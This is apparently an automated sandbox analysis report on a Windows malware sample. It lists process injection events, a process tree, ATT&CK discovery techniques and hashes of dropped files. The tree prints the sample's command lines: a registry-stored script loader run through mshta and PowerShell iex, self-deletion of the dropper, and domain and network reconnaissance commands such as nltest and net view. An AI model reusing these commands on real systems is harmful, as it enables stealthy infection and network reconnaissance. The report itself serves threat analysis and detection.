Token: SeSystemtimePrivilege	4080	WMIC.exe
Token: SeProfSingleProcessPrivilege	4080	WMIC.exe
Token: SeIncBasePriorityPrivilege	4080	WMIC.exe
Token: SeCreatePagefilePrivilege	4080	WMIC.exe
Token: SeBackupPrivilege	4080	WMIC.exe
Token: SeRestorePrivilege	4080	WMIC.exe
Token: SeShutdownPrivilege	4080	WMIC.exe
Token: SeDebugPrivilege	4080	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4080	WMIC.exe
Token: SeRemoteShutdownPrivilege	4080	WMIC.exe
Token: SeUndockPrivilege	4080	WMIC.exe
Token: SeManageVolumePrivilege	4080	WMIC.exe
Token: 33	4080	WMIC.exe
Token: 34	4080	WMIC.exe
Token: 35	4080	WMIC.exe
Token: 36	4080	WMIC.exe
Token: SeShutdownPrivilege	2440	Explorer.EXE
Token: SeCreatePagefilePrivilege	2440	Explorer.EXE
Token: SeShutdownPrivilege	2440	Explorer.EXE
Token: SeCreatePagefilePrivilege	2440	Explorer.EXE
Token: SeDebugPrivilege	3140	tasklist.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid	Process
2440	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 2456 wrote to memory of 2256	2456	mshta.exe	95
PID 2456 wrote to memory of 2256	2456	mshta.exe	95
PID 2256 wrote to memory of 1436	2256	powershell.exe	98
PID 2256 wrote to memory of 1436	2256	powershell.exe	98
PID 1436 wrote to memory of 4664	1436	csc.exe	99
PID 1436 wrote to memory of 4664	1436	csc.exe	99
PID 2256 wrote to memory of 1480	2256	powershell.exe	100
PID 2256 wrote to memory of 1480	2256	powershell.exe	100
PID 1480 wrote to memory of 1104	1480	csc.exe	101
PID 1480 wrote to memory of 1104	1480	csc.exe	101
PID 2256 wrote to memory of 2440	2256	powershell.exe	45
PID 2256 wrote to memory of 2440	2256	powershell.exe	45
PID 2256 wrote to memory of 2440	2256	powershell.exe	45
PID 2256 wrote to memory of 2440	2256	powershell.exe	45
PID 2440 wrote to memory of 3456	2440	Explorer.EXE	15
PID 2440 wrote to memory of 3456	2440	Explorer.EXE	15
PID 2440 wrote to memory of 3368	2440	Explorer.EXE	102
PID 2440 wrote to memory of 3368	2440	Explorer.EXE	102
PID 2440 wrote to memory of 3368	2440	Explorer.EXE	102
PID 2440 wrote to memory of 3456	2440	Explorer.EXE	15
PID 2440 wrote to memory of 3456	2440	Explorer.EXE	15
PID 2440 wrote to memory of 3764	2440	Explorer.EXE	38
PID 2440 wrote to memory of 3764	2440	Explorer.EXE	38
PID 2440 wrote to memory of 3764	2440	Explorer.EXE	38
PID 2440 wrote to memory of 3764	2440	Explorer.EXE	38
PID 2440 wrote to memory of 4620	2440	Explorer.EXE	36
PID 2440 wrote to memory of 4620	2440	Explorer.EXE	36
PID 2440 wrote to memory of 4620	2440	Explorer.EXE	36
PID 2440 wrote to memory of 4620	2440	Explorer.EXE	36
PID 2440 wrote to memory of 2320	2440	Explorer.EXE	26
PID 2440 wrote to memory of 2320	2440	Explorer.EXE	26
PID 2440 wrote to memory of 3368	2440	Explorer.EXE	102
PID 2440 wrote to memory of 3368	2440	Explorer.EXE	102
PID 3368 wrote to memory of 4900	3368	cmd.exe	104
PID 3368 wrote to memory of 4900	3368	cmd.exe	104
PID 3368 wrote to memory of 4900	3368	cmd.exe	104
PID 2440 wrote to memory of 2320	2440	Explorer.EXE	26
PID 2440 wrote to memory of 2320	2440	Explorer.EXE	26
PID 3368 wrote to memory of 4900	3368	cmd.exe	104
PID 3368 wrote to memory of 4900	3368	cmd.exe	104
PID 2440 wrote to memory of 4828	2440	Explorer.EXE	106
PID 2440 wrote to memory of 4828	2440	Explorer.EXE	106
PID 2440 wrote to memory of 4224	2440	Explorer.EXE	105
PID 2440 wrote to memory of 4224	2440	Explorer.EXE	105
PID 2440 wrote to memory of 4224	2440	Explorer.EXE	105
PID 2440 wrote to memory of 4224	2440	Explorer.EXE	105
PID 4828 wrote to memory of 4080	4828	cmd.exe	109
PID 4828 wrote to memory of 4080	4828	cmd.exe	109
PID 4828 wrote to memory of 4288	4828	cmd.exe	110
PID 4828 wrote to memory of 4288	4828	cmd.exe	110
PID 2440 wrote to memory of 4224	2440	Explorer.EXE	105
PID 2440 wrote to memory of 4224	2440	Explorer.EXE	105
PID 2440 wrote to memory of 2412	2440	Explorer.EXE	111
PID 2440 wrote to memory of 2412	2440	Explorer.EXE	111
PID 2440 wrote to memory of 1380	2440	Explorer.EXE	113
PID 2440 wrote to memory of 1380	2440	Explorer.EXE	113
PID 1380 wrote to memory of 340	1380	cmd.exe	115
PID 1380 wrote to memory of 340	1380	cmd.exe	115
PID 2440 wrote to memory of 4348	2440	Explorer.EXE	119
PID 2440 wrote to memory of 4348	2440	Explorer.EXE	119
PID 2440 wrote to memory of 2408	2440	Explorer.EXE	121
PID 2440 wrote to memory of 2408	2440	Explorer.EXE	121
PID 2408 wrote to memory of 8	2408	cmd.exe	123
PID 2408 wrote to memory of 8	2408	cmd.exe	123

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3456

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:2320

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4620

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3764

C:\Users\Admin\AppData\Local\Temp\4e.exe
"C:\Users\Admin\AppData\Local\Temp\4e.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2440
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cqde='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cqde).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\C8075711-8708-3A2C-517C-AB0E15700F22\\\DriverDocument'));if(!window.flag)close()</script>"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vfurwx -value gp; new-alias -name vlrcmoj -value iex; vlrcmoj ([System.Text.Encoding]::ASCII.GetString((vfurwx "HKCU:Software\AppDataLow\Software\Microsoft\C8075711-8708-3A2C-517C-AB0E15700F22").ControlJunk))
    3⤵
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2256
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e4h3wv4j\e4h3wv4j.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1436
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B6A.tmp" "c:\Users\Admin\AppData\Local\Temp\e4h3wv4j\CSC4317AF4E638B444AA2816876D87514.TMP"
        5⤵
        
        PID:4664
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qqftx3ny\qqftx3ny.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1480
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7C83.tmp" "c:\Users\Admin\AppData\Local\Temp\qqftx3ny\CSC8CFC0D6B1DC148C989FA43BA82461A9.TMP"
        5⤵
        
        PID:1104
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\4e.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:3368
- - C:\Windows\system32\PING.EXE
    ping localhost -n 5
    3⤵
    - Runs ping.exe
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:4900
- C:\Windows\syswow64\cmd.exe
  "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  2⤵
  PID:4224
- C:\Windows\system32\cmd.exe
  cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4828
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic computersystem get domain
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4080
- - C:\Windows\system32\more.com
    more
    3⤵
    PID:4288
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:2412
- C:\Windows\system32\cmd.exe
  cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1380
- - C:\Windows\system32\systeminfo.exe
    systeminfo.exe
    3⤵
    - Gathers system information
    PID:340
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:4348
- C:\Windows\system32\cmd.exe
  cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2408
- - C:\Windows\system32\net.exe
    net view
    3⤵
    - Discovers systems in the same network
    PID:8
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:2960
- C:\Windows\system32\cmd.exe
  cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:3436
- - C:\Windows\system32\nslookup.exe
    nslookup 127.0.0.1
    3⤵
    PID:1148
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:3704
- C:\Windows\system32\cmd.exe
  cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:1328
- - C:\Windows\system32\tasklist.exe
    tasklist.exe /SVC
    3⤵
    - Enumerates processes with tasklist
    - Suspicious use of AdjustPrivilegeToken
    PID:3140
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:808
- C:\Windows\system32\cmd.exe
  cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:1092
- - C:\Windows\system32\driverquery.exe
    driverquery.exe
    3⤵
    PID:4060
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:624
- C:\Windows\system32\cmd.exe
  cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:3688
- - C:\Windows\system32\reg.exe
    reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
    3⤵
    PID:424
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:3208
- C:\Windows\system32\cmd.exe
  cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:3084
- - C:\Windows\system32\net.exe
    net config workstation
    3⤵
    PID:400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 config workstation
      4⤵
      PID:2332
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:2064
- C:\Windows\system32\cmd.exe
  cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:224
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts
    3⤵
    PID:3908
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:4616
- - C:\Windows\system32\nltest.exe
    nltest /domain_trusts /all_trusts
    3⤵
    PID:4188
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:4772
- C:\Windows\system32\cmd.exe
  cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:5032
- - C:\Windows\system32\net.exe
    net view /all /domain
    3⤵
    - Discovers systems in the same network
    PID:2404
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:1924
- C:\Windows\system32\cmd.exe
  cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:5004
- - C:\Windows\system32\net.exe
    net view /all
    3⤵
    - Discovers systems in the same network
    PID:2200
- C:\Windows\system32\cmd.exe
  cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:4736
- C:\Windows\system32\cmd.exe
  cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\3F30.bin1 > C:\Users\Admin\AppData\Local\Temp\3F30.bin & del C:\Users\Admin\AppData\Local\Temp\3F30.bin1"
  2⤵
  PID:2008

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\3F30.bin

Filesize
65KB

MD5
8eb75d8b05ec34f3f1806cc70677385b

SHA1
7c2557cfc7a333368c35b8fa08a1b3c862fa3dfa

SHA256
f002c7f9eae0c829a0db6c5cc9913102c132210a22e6c21e52800c7f2a53afdb

SHA512
5b4ba71ceb5af0df709b630d5c381ec7d377577b6c1a5d119ca0e7a320d2ea7957ed9f6aca41c6f5442387b2af3c5e95032a6a99b87a879cbaf9447a3d73f1af

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
44B

MD5
f7aea2435aa888b709ca20f816c33bfd

SHA1
38717c9a73b5f8bd399839cbe0aa57518427e758

SHA256
f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5

SHA512
1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
2KB

MD5
464ed4ebf6a6f2e364b066fc8acbff39

SHA1
45f92e6187fd77344d6cf505534441e09f67ff47

SHA256
f1e5e79d4f817cbddec3fbbf2a650c75b6473215e66bae0e86979a72d91f0d1b

SHA512
9efdbd3a03a73d0f83a012bd047ef7d6c381a93f0a350a74b79ba0affd5e3a5c4f5fb256a27cb4ec0e6787e9bd004050e7078cd80d96d39eccae01b83bf17456

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
2KB

MD5
464ed4ebf6a6f2e364b066fc8acbff39

SHA1
45f92e6187fd77344d6cf505534441e09f67ff47

SHA256
f1e5e79d4f817cbddec3fbbf2a650c75b6473215e66bae0e86979a72d91f0d1b

SHA512
9efdbd3a03a73d0f83a012bd047ef7d6c381a93f0a350a74b79ba0affd5e3a5c4f5fb256a27cb4ec0e6787e9bd004050e7078cd80d96d39eccae01b83bf17456

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
2KB

MD5
dfae92fe3ef9eac61b817eb93a97aab8

SHA1
1f05700b27ef45d0f8c4cd88ac50d0213a90251b

SHA256
778a5862181d0e25a543e5cd4bc80c2d779de2e538424bb64f53bcf2f2d3c591

SHA512
8a69f6a5ba9ab90a9cee250aa6a0b9e32e22c9b90b11e4b7ebd77e3e97710709f1c8192fbc21a3480941dc3d98cffdb8ab4fb0624f389ce2a23d94fc2f04fbad

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
2KB

MD5
3bbda85fe8f57f0f508147f078f36e8a

SHA1
30f36b48e0878a514a9b6aca0475f75c95a05e69

SHA256
639e9170b22225901d713c7753c02abad18883c36ebecb5b411305845516d622

SHA512
990fe592cf77ef35fb38d7f3474af936724c4aa316952507322fcff3269920067abb477df855fe7dcd037f706ecb0a2b620f19c68bce324dcdd6c2139678a3dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
2KB

MD5
3bbda85fe8f57f0f508147f078f36e8a

SHA1
30f36b48e0878a514a9b6aca0475f75c95a05e69

SHA256
639e9170b22225901d713c7753c02abad18883c36ebecb5b411305845516d622

SHA512
990fe592cf77ef35fb38d7f3474af936724c4aa316952507322fcff3269920067abb477df855fe7dcd037f706ecb0a2b620f19c68bce324dcdd6c2139678a3dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
9KB

MD5
0fffd884e09e6d8f698526fc64803ae3

SHA1
e95510857aa81274eb57887db5eba67fb6a9ace2

SHA256
f8700b9183d5f04e854f6781a9a5d336ee814d338fc7585e2bb10c813f69731c

SHA512
aaccddb721a33ce361c4584f5ff8ce2e87d55c8877108ca5dea20fb7a188026da3b4beb9d33e4d1c344a47ba1ead88e3688cbdd4c281390ec0504f8f3d867a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
9KB

MD5
0fffd884e09e6d8f698526fc64803ae3

SHA1
e95510857aa81274eb57887db5eba67fb6a9ace2

SHA256
f8700b9183d5f04e854f6781a9a5d336ee814d338fc7585e2bb10c813f69731c

SHA512
aaccddb721a33ce361c4584f5ff8ce2e87d55c8877108ca5dea20fb7a188026da3b4beb9d33e4d1c344a47ba1ead88e3688cbdd4c281390ec0504f8f3d867a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
35KB

MD5
5d17477066f24cc03ae2670f4fbce948

SHA1
0d6112c1ed5f32f7ddeb72d643053e4d20e9bb87

SHA256
deb39fa9441113866df47cb109d6f90641b25f125aa5097450d9214ee1f8f9c8

SHA512
3c2e5d6149312779fa41a1bf61da56cda6dc119b34c5ed325076dfd79cd8e870e6dd9fec859789e2b77245d683a250d14585937d710af6a799d9be003933013c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
35KB

MD5
5d17477066f24cc03ae2670f4fbce948

SHA1
0d6112c1ed5f32f7ddeb72d643053e4d20e9bb87

SHA256
deb39fa9441113866df47cb109d6f90641b25f125aa5097450d9214ee1f8f9c8

SHA512
3c2e5d6149312779fa41a1bf61da56cda6dc119b34c5ed325076dfd79cd8e870e6dd9fec859789e2b77245d683a250d14585937d710af6a799d9be003933013c

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
64KB

MD5
383f80c1f53beeec486ea89b4ff73eaa

SHA1
b6ac006e0c642227ac800d24708e6c6f5462a704

SHA256
f45c3b4f2c2298a61c4da41489b4314ae2198afb4b769ade0c507f48f272e5be

SHA512
8d25005367709cc826bf43633ca938f47226cb607870d491ef58247637ecd3de7d780b93dea2704d270e4da0d95a29d8151d6510fd4842feee8b2f831e20aaf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
64KB

MD5
383f80c1f53beeec486ea89b4ff73eaa

SHA1
b6ac006e0c642227ac800d24708e6c6f5462a704

SHA256
f45c3b4f2c2298a61c4da41489b4314ae2198afb4b769ade0c507f48f272e5be

SHA512
8d25005367709cc826bf43633ca938f47226cb607870d491ef58247637ecd3de7d780b93dea2704d270e4da0d95a29d8151d6510fd4842feee8b2f831e20aaf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
65KB

MD5
b8eeb649c2323aa7c17d80f14eff27ac

SHA1
99a08640a2a4a186b19947d52d1e093bd63a579f

SHA256
2913b804e5511cf14586847e9a2d61985b1b5417e2940fd5c760f4cd0f09245e

SHA512
291dfe37cc44731ce2e83fae78f0d3a6db448e74b0c298e6adffa5f7f56ff40aed3245a11cef3d2ea0706596e37b421d6c63e47c07cd7abb252f41de357f51fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
65KB

MD5
b8eeb649c2323aa7c17d80f14eff27ac

SHA1
99a08640a2a4a186b19947d52d1e093bd63a579f

SHA256
2913b804e5511cf14586847e9a2d61985b1b5417e2940fd5c760f4cd0f09245e

SHA512
291dfe37cc44731ce2e83fae78f0d3a6db448e74b0c298e6adffa5f7f56ff40aed3245a11cef3d2ea0706596e37b421d6c63e47c07cd7abb252f41de357f51fa

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
65KB

MD5
367ae5d77a61b43745d9a5a288d98d7e

SHA1
79399a702c6ae7b7ae8e6ac74e5a5c65af2b0c01

SHA256
c0c13f5cb23f521d8bb4c81edfe9ad1f0675854145cd7bd8078597f0af1b1126

SHA512
5fcb4e50295fa3d0eedaacf0e14467c866089d181732c965107e63379159301bcb8c7b54ea587c2dcf81b344435e3afbc91f35b91fec4379354a621abbe59ce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
65KB

MD5
2665f652d887979f591a2c1b5610cde8

SHA1
336d93597c43a3e9b1f7326c971a4a11842ad12a

SHA256
01fd99edd8ca648beb42f2f669f0ed1d5cce3938cfd8a973345e281273aff7da

SHA512
72f45866dd2628e872fa2528a88c453a1bd9a42f1588a1563a774c3010094d3a280a86a7ab1f2c41a94c161127302f63740d434e3004750dbd1700c48de891b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
65KB

MD5
4b7c0d8881070ca00daba5fa8bc3e915

SHA1
de86f777d178370714370d65a8c0275771c6959c

SHA256
06ca844167a1b6928c2496cb4dfa7f0ffeca05126134fdd217a50770e16768b9

SHA512
e4b495f510d4a781d758080f3f5fa4c8d1dcfbf8ecfe3be6fc6d576597e7357048ff33f3772d2a98f0aa35f5501109d35f5e84bec80f18dad3de49bf1c37a55a

Download Submit
C:\Users\Admin\AppData\Local\Temp\3F30.bin1

Filesize
65KB

MD5
8eb75d8b05ec34f3f1806cc70677385b

SHA1
7c2557cfc7a333368c35b8fa08a1b3c862fa3dfa

SHA256
f002c7f9eae0c829a0db6c5cc9913102c132210a22e6c21e52800c7f2a53afdb

SHA512
5b4ba71ceb5af0df709b630d5c381ec7d377577b6c1a5d119ca0e7a320d2ea7957ed9f6aca41c6f5442387b2af3c5e95032a6a99b87a879cbaf9447a3d73f1af

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7B6A.tmp

Filesize
1KB

MD5
9e7c2742a9a7efd347b66bb9b70d63be

SHA1
807d9b29976462ce70323e1ecba225d26932caec

SHA256
0e0a3d1e666c5249e0962373f9cadef4bf4c42ef886da651524f3725cf95a2b0

SHA512
de1e39f135640983f90fa6c983635bd19b7655529f113744a3ca55671652349e0f2f8d576eff16653cf1e43b36b8350f0521a67d361aedb81c3fce8701f89ac7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7C83.tmp

Filesize
1KB

MD5
d0613851732b363f3751b219a0444fd2

SHA1
1ba80345b41e263020486e421d63333202e780e9

SHA256
2637208a21a2b107529e4b412ce4b14c159ce3a24c816ea1b679bc5389a859ff

SHA512
599b05aecfb4f40fcee0dff23802ba3f128e1d51a6f9cb55be6df2271cfbbf40a51cf3a6fb9d37bf50a8b6399f9bec57651874d02a67a62920ef570bc3465870

Download Submit
C:\Users\Admin\AppData\Local\Temp\e4h3wv4j\e4h3wv4j.dll

Filesize
3KB

MD5
79f21935016f9becc5def98399ed9d44

SHA1
d9bf30c5e7c1c2a0de0a267bae320804529eb178

SHA256
261b882f6c2ffcc582f3a70673fce866a30e3e2a12507d3cdb2ad6b6b1dcbfb2

SHA512
33c9cd90cb432db7e9bb9103bc5528e5ca6036fef7dc4f0d1e749fc0d54d255b28e113bf5f7121f7ef1b9807957e1c00bd3b5cc666c3364c1d7d7474260fe8b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\qqftx3ny\qqftx3ny.dll

Filesize
3KB

MD5
e743e504995ad858aca5b8edeee1f0fa

SHA1
67e3206b9507a50e928c4146dd59397e742f8209

SHA256
5e1c0996ea5d197c6c40f1495091d17f8a995fbf987b7d3df6e02d69bac12907

SHA512
116c18fd34582bcfdab2d4959eab2a65e72e7cf0894ac92b8f0af66207f854c3bdc85b4bc356087bd16292d553fba4781bf4cde8f18faa8d88d360b03410234f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e4h3wv4j\CSC4317AF4E638B444AA2816876D87514.TMP

Filesize
652B

MD5
f359f766dd0955bdf083bb27eaff5bb9

SHA1
f161b6be66d87ca2cbba515d48c34bbd66d64720

SHA256
9015479d930c98d204d6c6cf5ec57af39bc32f2a0979cce2ba169d0d192e6e9e

SHA512
5ce344fb197dd4a5e6bf75c10bce670ed3b3ffd718f48b9c86f819dae79bc8e4bd29f2dbeb1879bb3050049a51a158979ac2d360168493bac714ecb03a24defb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e4h3wv4j\e4h3wv4j.0.cs

Filesize
410B

MD5
9a10482acb9e6952b96f4efc24d9d783

SHA1
5cfc9bf668351df25fcda98c3c2d0bb056c026c3

SHA256
a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377

SHA512
e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e4h3wv4j\e4h3wv4j.cmdline

Filesize
369B

MD5
e799d0059397cd0ec86c4cb27100671a

SHA1
e59025d098ea5733e253fd0cec36324ee7042626

SHA256
65ef67580ac97c35be9c9eae14df09cd034393f0528f9c5f560d86f2ede11b82

SHA512
03bca3c62a53dd7b2cc65b41c0abbfc5752a0d7df1363c67e372fa3d56bdfc72dcbb0437e7b8b7cd1db9ac2a9b85bc1f3433390d2ef334400c157f5ac748e1c3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qqftx3ny\CSC8CFC0D6B1DC148C989FA43BA82461A9.TMP

Filesize
652B

MD5
aa2522f6857843b7573ae82b96cf8bb3

SHA1
9dc330bec0cd74f9c312a2d01d971668ed57aada

SHA256
70b4385f8ac7a2f629193f37fe2807a9f90fb488d8c3cab39d9df1e70116f8d6

SHA512
21b4e54bd9ad8bb2c1b6a0dfb0ecd6b5987a69b36ae7c2013fd68e20aa23cc224429aefee4bdc6191982f7faeee001e6237d24f67fa346904c24f49a3bfe775a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qqftx3ny\qqftx3ny.0.cs

Filesize
400B

MD5
aca9704199c51fde14b8bf8165bc2a4c

SHA1
789b408ccad29240bd093515cbd19a199ad2c1c8

SHA256
cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27

SHA512
a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qqftx3ny\qqftx3ny.cmdline

Filesize
369B

MD5
23f91703765d07f4d4e6779f78def54f

SHA1
9e634754723d8a088f8fbfa50f4a6423be33f6b5

SHA256
104af545dc17b00a96d90e9556667d891ecf507ecdbc39105d38c31982d6f12b

SHA512
